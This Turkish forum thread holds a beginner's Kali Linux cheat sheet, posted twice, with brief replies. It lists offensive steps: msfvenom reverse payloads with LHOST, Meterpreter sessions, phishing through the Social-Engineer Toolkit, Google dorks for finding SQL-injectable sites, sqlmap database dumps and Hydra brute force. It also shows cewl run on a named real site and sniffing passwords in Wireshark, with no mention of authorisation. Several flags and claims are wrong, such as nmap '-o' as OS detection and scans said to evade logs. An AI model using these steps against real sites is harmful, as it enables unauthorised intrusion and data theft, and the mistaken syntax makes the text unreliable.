Eğer siber güvenlik ile ilgileniyor iseniz giriş seviyesi kendi yaptığım bir özet.
Kali Linux.
Metasploit-Framework ile penetrasyon testi:
Msfconsole >>> metasploit çalıştırır.
Show (payloads-exploits) >>> payload veya exploitleri görüntüler.
Msfvenom -p (payload adı) lhost=(IP adresiniz) lport=(herhangi bir 4 haneli sayı girin) -f (format) > (dosyaadi).(format)
Search (kelime) >>> aramak istediğiniz kelimeyi girin.
Use (exploit-payload adı)>>> exploit veya payloada girer.
Show options >>> ayarları görüntüler.
Run >>> tarama yapar.
Bağlantı kurulduğunda meterpreter konsolu açılır.
Help >>> yapabileceklerinizi buraya bakarak yapabilirsiniz.
Maltego ile sorgu;
Maltego >>> maltegoyu çalıştırır.
Sosyal mühendislik.
Setoolkit >>> sosyal mühendislik kitini çalıştırır.
Phishing vb yapabilirsiniz.
Site zaafiyet taraması:
1-)fierce ile keşif yapma;
Fierce -h >>> yardım almak için kullanılır.
Fierce --domain (sitealanadi) >>> site IP keşfi yapmak için kullanılır.
2-)wapiti ile tarama;
Wapiti -u (sitelinki) >>> XSS veya SQL açığı bulursa bildirecektir.
3-)owaspzap;
Zaproxy >>> ile grafiksel bir arayüz çıkar buradan linki girip tarama yapabilirsiniz.
4-)dirb ile admin panel bulma;
Dirb (sitelinki) >>> admin panel bulmak için kullanılır genelde.
5-)nmap ile site zaafiyet taraması yapma;
İlk önce site IP adresini buluyoruz. Bunun için ipsorgu.com a girip linki yapıştırıyoruz ve IP adresini kopyalıyoruz. Ardından.
Nmap (sitelinki) >>> genel tarama yapar.
Nmap -SS (sitelinki) >>> log kayıtlarına takılmadan tarama yapar.
Nmap -o -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek tarama yapar.
Nmap -o -a -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak tarama yapar.
Nmap -o -a -SS -il (dosya).txt >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak, çoklu IP taraması yapar.
6-) whois ile site bilgilerini öğrenme;
Whois (sitealanadı.com) >>> site ile ilgili dökümleri önünüze sunar.
Wordlist oluşturma.
1-)normal wordlist oluşturma;
Crunch (min hane) (Max hane) (wordlistte geçecek karakterler) -o (wordlistadi).txt
Örnek;
Crunch 8 8 1234567890abcdefg -o liste.txt
2-)sözlük (site) wordlisti oluşturma;
Cewl -d (kaç katman tarıyacağını girin) -m (kaç haneli olacağını girin) (site linki) -w (wordlist adı)
Örnek;
Cewl -d 3 -m 8 http://www.alphaonenow.org/info.php?id=131 -w liste.
3-) kişiye yönelik wordlist oluşturma;
İlk önce cupp aracını indiriyoruz.
Apt install cupp.
Ardından.
Cupp -i
Sonra gereken bilgileri veriyoruz ve wordlist hazır.
Bruteforce saldırısı yapma.
1-)Hydra ile SSL destekli sitelere saldırma;
Hydra -h >>> 4 farklı seçenek vardır uygulayabilirsiniz.
(Başka araçlarda var GitHub'ta mevcut)
Ağ izleme.
1-) Wireshark ile ağ izleme;
Wireshark >>> programı açar istediğiniz ağı izleyebilirsiniz eğer HTTP ise follow/TCP stream diyerek kişinin şifrelerini ve adlarını görebilirsiniz(detaylı adli bilişim aracıdır vaktinizi alabilir)
2-)kismet ile ağınızda kim var kim yok kontrol edin;
Kismet -c (ağ geçidinizi yazın örnek: WLAN0, ETH0) >>> bir link verecektir tarayıcınızda açın Linux kullanıcı adınızı şifrenizi girin (root geçerlidir)
3-) ettercap ile ağ izleme:
Ettercap -g >>> ettercapı başlatır.
Site sömürgecilik.
1-)sqlmap ile site sömürgesi;
Sqlmap -u (sitelinki) --dbs >>> sitenin databasesini araştırır.
Sqlmap -u (sitelinki) -d (database adı) --tables
>>> Sitenin tablolarını araştırır.
Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) --columns >>> sitenin columnlarını araştırır.
Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) -c (column adı) --dump >>> size içeriği veya sonucu gösterir.
Bu sadece SQL açıklı sitelerde geçerlidir.
SQL açıklı site nasıl bulunur?
Google'da dork aratarak bulabilirsiniz.
Dorkları kendiniz yapsanız daha etkili sonuç alırsınız.
Hazır dorklar;
İnurl: Staff_id=
İnurl: PHP? _id=
İnurl: None_id=
İnurl: Me_id=
İnurl: Login? _id=
Sitede SQL açığı olduğunu nasıl anlarız?
Site linkinin sonuna (') işaretini koyarız eğer varsa;
Mysql_ ifadesi geçen bir hata alırız.
Bilgisayarınızı bir web sunucusu yapın!
Service Apache2 start-stop-restart >>> Apache2 (web) sunucusunu başlat-durdur-yenidenbaşlat
Bilgisayarınızın IP adresi sunucunuzun adresidir. IP adresinizi tarayıcıya girin ve entera basın. Debian sitesi gelecektir.
/var/www/html >>> buraya HTML dosyanızı atın ve tarayıcıya.
İp adresiniz/(dosyanizin adi).html olarak aratın. Siteniz karşınıza gelecektir.
Örnek;
192.168.0.1/login.html
Kali Linux genel komutlar:
Shutdown -h (şimdi-Now, saat-{örneğin. 21:00})>>>
Bilgisayarı kapatır.
Shutdown -r (şimdi-Now, saat-{örneğin. 20:00})>>> bilgisayarı yeniden başlatır.
Ls >> dizin içeriğini görüntüler.
CD (klasör) >> klasöre girer.
CD. >> klasörden çıkar.
Sudo >>> root değilken root işlem yapmayı sağlar.
Passwd (kullanıcı adı) >>> şifre değiştirir.
Apt-get Update >> Kali Linux paketlerini yükseltir.
Apt-get upgrade >> Kali Linux paketlerini günceller.
Apt install (paketadı) >> paket yükler.
Apt-get install --reinstall (paket adı) >>> paketi baştan kurar.
Chmod +X (dosyaadi) >> dosyaya izin verir.
Chown (kullaniciadi) (dosyaismi) >> sahiplik değiştirir.
Chown -r root (dosyaismi) >> root yetkisi verir.
Cp (dosyaadi) (tasinacak dizin) >> dosya kopyalar.
Mv (dosyaadi) (tasinacak dizin) >> dosya taşır.
ZIP (dosyaadi) >> dosyayı arşivler.
Unzip (dosyaadi) >> dosyayı arşivden çıkarır.
Openvpn (dosyaismi) >>> VPN açar.
Kali Linux IP değiştirme.
İfconfig yazın >>> IP adresiniz hakkında bilgilerinizi görüntüler.
Yeni terminal açıp;
CD /etc/network/ >>> dizinine giriyoruz.
Nano interfaces >>> dosyayı düzenleyeceğiz.
&(En alt satıra inin)&
İface (ağ geçidiniz) inet static.
(Tabbasın)address (istediğiniz IP adresi yazın)
(Tabbasın)netmask (ilk terminalde yazanı yaz)
(Tabbasın)broadcast (ilk terminalde yazanı yaz)
(Tabbasın)gateway (modem arayüz ipnizi yazın)
CTRL+X basın sonra basın ve enterlayın.
Reboot yazın >>> sistemi yeniden başlatır.
İfup (ağ geçidiniz örnek: WLAN0, ETH0) >>> ağ geçidini etkinleştirir (her açılışta yazmanız gerekir)
Not: ETH0 da çalışacaktır WLAN0'da çalıştıramadım ama deneyin.
Websploit.
Apt install websploit >>> websploit aracını kurar.
Websploit >>> websploit aracını çalıştırır.
Show modules >>> tüm modülleri gösterir.
Use (modül adı) >>> modüle girer.
Options >>> ayarları görüntüler.
Help >>> yardım almak için kullanılır.
Set (ayar) >>> ayarları düzenler.
Execute >>> başlatır.
Termineter kullanımı.
Apt install termineter >>> termineteri yükler.
Termineter >>> termineteri başlatır.
Show modules >>> modülleri görüntüler.
Use (modül) >>> modüle girer.
Show options >>> ayarları görüntüler.
Set (ayar) >>> ayar değiştirir.
Help >>> yardım almak için kullanılır.
Run >>> modülü başlatır.
Lynis ile sistem güvenlik taraması.
Git clone (indirme linki)>>> lynis aracını GitHub deposundan indiriyoruz.
/Lynis audit System >>> tarama başlatır.
Wpscan ile WordPress site taraması;
Wpscan --URL (sitelinki.com)
Bu aralar siber güvenliği araştırıyorum giriş yapmak istiyorum hangi Linux'u kullanacağımda karasız kalmıştım Kali kullansam olur mu?
Bilgisayarınıza VirtualBox indirdikten sonra Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution sitesinden Download'a basıp Virtual Machines kısmına basıyorsunuz. Aşağıda 64bit 32 bit seçme yeri var sağ taraftakini indirmeniz gerekiyor dosya uzantısı .ova olacak. Ondan sonra VirtualBox'a giriyorsunuz. Sekmelerden "New" diyip isim kısmına Kali Linux yazın otomatik olarak Linux olarak ayarlayacak sistemi. Linux'u oluşturduktan sonra oluşturduğunuz sistemi açın açılırken sizden dosya seçmenizi isteyecek. Bu noktada .ova uzantılı dosyayı seçmeniz gerekiyor. Artık kullanıma hazır sanal bir işletim sistemine sahipsiniz.Aynen kardeşim tek işim Linux'ta heçkırlık yapmak.
Denemek istiyorum Linux Mint, Pardus ve Kali Linux arasında kaldım.
Eğer siber güvenlik ile ilgileniyor iseniz giriş seviyesi kendi yaptığım bir özet.
Kali Linux
METASPLOİT-Framework İLE PENETRASYON TESTİ:
Msfconsole >>> metasploit çalıştırır
Show (payloads-exploits) >>> Payload veya Exploitleri görüntüler
Msfvenom -p (payload adı) LHOST=(IP adresiniz) LPORT=(HERHANGİ BİR 4 HANELİ SAYI GİRİN) -f (format) > (dosyaadi).(format)
Search (kelime) >>> aramak istediğiniz kelimeyi girin
Use (exploit-payload adı)>>> exploit veya payloada girer
Show options >>> ayarları görüntüler
Run >>> tarama yapar
Bağlantı Kurulduğunda Meterpreter Konsolu Açılır
Help >>> yapabileceklerinizi buraya bakarak yapabilirsiniz
Maltego İle Sorgu;
Maltego >>> maltegoyu çalıştırır
SOSYAL MÜHENDİSLİK
Setoolkit >>> sosyal mühendislik kitini çalıştırır
Phishing vb yapabilirsiniz.
SİTE ZAAFİYET TARAMASI:
1-)Fierce İle Keşif Yapma;
Fierce -h >>> yardım almak için kullanılır
Fierce --domain (sitealanadi) >>> site IP keşfi yapmak için kullanılır
2-)Wapiti İle Tarama;
Wapiti -u (sitelinki) >>> XSS Veya SQL açığı bulursa bildirecektir.
3-)OwaspZap;
Zaproxy >>> ile grafiksel bir arayüz çıkar buradan linki girip tarama yapabilirsiniz.
4-)Dirb İle Admin Panel Bulma;
Dirb (sitelinki) >>> Admin Panel Bulmak için Kullanılır Genelde
5-)Nmap İle Site Zaafiyet Taraması Yapma;
İlk önce site IP adresini buluyoruz. Bunun için ipsorgu.com a girip linki yapıştırıyoruz ve IP adresini kopyalıyoruz. Ardından
Nmap (sitelinki) >>> genel tarama yapar
Nmap -SS (sitelinki) >>> log kayıtlarına takılmadan tarama yapar
Nmap -o -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek tarama yapar
Nmap -o -A -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak tarama yapar
Nmap -o -A -SS -iL (dosya).txt >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak, çoklu IP taraması yapar
6-) Whois İle Site Bilgilerini Öğrenme;
Whois (sitealanadı.com) >>> site ile ilgili dökümleri önünüze sunar
WORDLİST OLUŞTURMA
1-)Normal Wordlist Oluşturma;
Crunch (min hane) (Max hane) (wordlistte geçecek karakterler) -o (wordlistadi).txt
Örnek;
Crunch 8 8 1234567890abcdefg -o liste.txt
2-)Sözlük (Site) Wordlisti Oluşturma;
Cewl -d (kaç katman tarıyacağını girin) -m (kaç haneli olacağını girin) (site linki) -w (wordlist adı)
Örnek;
Cewl -d 3 -m 8 http://www.alphaonenow.org/info.php?id=131 -w liste
3-) Kişiye Yönelik Wordlist Oluşturma;
İlk önce cupp aracını indiriyoruz
Apt install cupp
Ardından
Cupp -i
Sonra gereken bilgileri veriyoruz ve wordlist hazır
BRUTEFORCE SALDIRISI YAPMA
1-)Hydra İle SSL Destekli Sitelere Saldırma;
Hydra -h >>> 4 farklı seçenek vardır uygulayabilirsiniz
(Başka Araçlarda Var GitHub'ta mevcut)
AĞ İZLEME
1-) Wireshark İle Ağ İzleme;
Wireshark >>> programı açar istediğiniz ağı izleyebilirsiniz eğer HTTP ise follow/TCP Stream diyerek kişinin şifrelerini ve adlarını görebilirsiniz(Detaylı Adli Bilişim Aracıdır Vaktinizi Alabilir)
2-)Kismet İle Ağınızda Kim Var Kim Yok Kontrol Edin;
Kismet -c (ağ geçidinizi yazın örnek: WLAN0, ETH0) >>> bir link verecektir tarayıcınızda açın Linux kullanıcı adınızı şifrenizi girin (root geçerlidir)
3-) Ettercap İle Ağ İzleme:
Ettercap -g >>> ettercapı başlatır
SİTE SÖMÜRGECİLİK
1-)SQLMap İle Site Sömürgesi;
Sqlmap -u (sitelinki) --dbs >>> sitenin databasesini araştırır
Sqlmap -u (sitelinki) -d (database adı) --tables
>>> Sitenin tablolarını araştırır
Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) --columns >>> sitenin columnlarını araştırır
Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) -c (column adı) --dump >>> size içeriği veya sonucu gösterir
Bu sadece SQL açıklı sitelerde geçerlidir.
SQL açıklı site nasıl bulunur?
Google'da dork aratarak bulabilirsiniz
Dorkları kendiniz yapsanız daha etkili sonuç alırsınız
Hazır Dorklar;
İnurl: Staff_id=
İnurl: PHP? _id=
İnurl: None_id=
İnurl: Me_id=
İnurl: Login? _id=
Sitede SQL açığı olduğunu nasıl anlarız?
Site linkinin sonuna (') işaretini koyarız eğer varsa;
Mysql_ ifadesi geçen bir hata alırız
BilgisayarINIZI BİR WEB SUNUCUSU YAPIN!
Service Apache2 start-stop-restart >>> Apache2 (web) sunucusunu başlat-durdur-yenidenbaşlat
Bilgisayarınızın IP adresi sunucunuzun adresidir. IP adresinizi tarayıcıya girin ve entera basın. Debian sitesi gelecektir.
/var/www/html >>> buraya HTML dosyanızı atın ve tarayıcıya
İp adresiniz/(dosyanizin adi).html olarak aratın. Siteniz karşınıza gelecektir.
Örnek;
192.168.0.1/login.html
Kali Linux GENEL KOMUTLAR:
Shutdown -h (şimdi-Now, saat-{örneğin. 21:00})>>>
Bilgisayarı kapatır
Shutdown -r (şimdi-Now, saat-{örneğin. 20:00})>>> bilgisayarı yeniden başlatır
Ls >> dizin içeriğini görüntüler
CD (klasör) >> klasöre girer
CD. >> klasörden çıkar
Sudo >>> root değilken root işlem yapmayı sağlar
Passwd (kullanıcı adı) >>> şifre değiştirir
Apt-get Update >> Kali Linux paketlerini yükseltir
Apt-get upgrade >> Kali Linux paketlerini günceller
Apt install (paketadı) >> paket yükler
Apt-get install --reinstall (paket adı) >>> paketi baştan kurar
Chmod +X (dosyaadi) >> dosyaya izin verir
Chown (kullaniciadi) (dosyaismi) >> sahiplik değiştirir.
Chown -r root (dosyaismi) >> root yetkisi verir
Cp (dosyaadi) (tasinacak dizin) >> dosya kopyalar
Mv (dosyaadi) (tasinacak dizin) >> dosya taşır
ZIP (dosyaadi) >> dosyayı arşivler
Unzip (dosyaadi) >> dosyayı arşivden çıkarır
Openvpn (dosyaismi) >>> VPN açar
Kali Linux İP DEĞİŞTİRME
İfconfig yazın >>> IP adresiniz hakkında bilgilerinizi görüntüler
Yeni Terminal Açıp;
CD /etc/network/ >>> dizinine giriyoruz
Nano interfaces >>> dosyayı düzenleyeceğiz
&(En Alt Satıra İnin)&
İface (ağ geçidiniz) inet static
(TabBasın)address (istediğiniz IP adresi yazın)
(TabBasın)netmask (ilk terminalde yazanı yaz)
(TabBasın)broadcast (ilk terminalde yazanı yaz)
(TabBasın)gateway (modem arayüz ipnizi yazın)
CTRL+X basın Sonra (Y) Basın ve Enterlayın
Reboot yazın >>> sistemi yeniden başlatır
İfup (ağ geçidiniz örnek: WLAN0, ETH0) >>> ağ geçidini etkinleştirir (her açılışta yazmanız gerekir)
Not: ETH0 da çalışacaktır WLAN0'da çalıştıramadım ama deneyin.
WEBSPLOİT
Apt install websploit >>> websploit aracını kurar
Websploit >>> websploit aracını çalıştırır
Show modules >>> tüm modülleri gösterir
Use (modül adı) >>> modüle girer
Options >>> ayarları görüntüler
Help >>> yardım almak için kullanılır
Set (ayar) >>> ayarları düzenler
Execute >>> başlatır
TERMİNETER KULLANIMI
Apt install termineter >>> termineteri yükler
Termineter >>> termineteri başlatır
Show modules >>> modülleri görüntüler
Use (modül) >>> modüle girer
Show options >>> ayarları görüntüler
Set (ayar) >>> ayar değiştirir
Help >>> yardım almak için kullanılır
Run >>> modülü başlatır
Lynis İle Sistem Güvenlik Taraması
Git clone (indirme linki)>>> Lynis aracını GitHub deposundan indiriyoruz
/Lynis audit System >>> tarama başlatır
WPScan ile WordPress Site Taraması;
Wpscan --URL (sitelinki.com)
Benim de işime yarar eyvallah.
Benim de işime yarar eyvallah.
Bu sitenin çalışmasını sağlamak için gerekli çerezleri ve deneyiminizi iyileştirmek için isteğe bağlı çerezleri kullanıyoruz.